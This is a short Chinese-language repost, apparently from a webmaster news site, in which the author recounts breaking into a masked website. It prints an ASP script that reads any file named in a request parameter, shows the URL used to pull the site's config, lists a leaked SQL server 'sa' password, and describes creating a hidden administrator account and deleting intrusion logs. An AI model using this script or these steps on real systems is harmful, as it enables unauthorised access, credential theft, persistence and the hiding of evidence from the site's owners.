| 攻擊目標:www.***.com 測試過的動作,一句話馬,加密馬,等。 測試結果:無效,無法上傳,無法進入系統。 經過2天的分析, 然后自己搞出了一個代碼,利用此代碼讀取了該網站下的config.asp文件源代碼 ------------------------------------------------------------------------- <% file=Request("file") Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject") if FSOOBJ.fileExists(file) then Set myfile=FSOOBJ.opentextfile(file,1) Response.write " " myfile.close Set myfile=nothing else Response.write "file(" & file & ") not exists." end if %> ------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp 讀取到的敏感內容 sql地址:***.***.***.*** 帳號:sa 密碼:u8f2444f 利用此帳號進入后,建立了123$的隱藏管理員用戶,刪除入侵日志后退出。 |
免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!
掃一掃,關注站長網微信
大家都在看
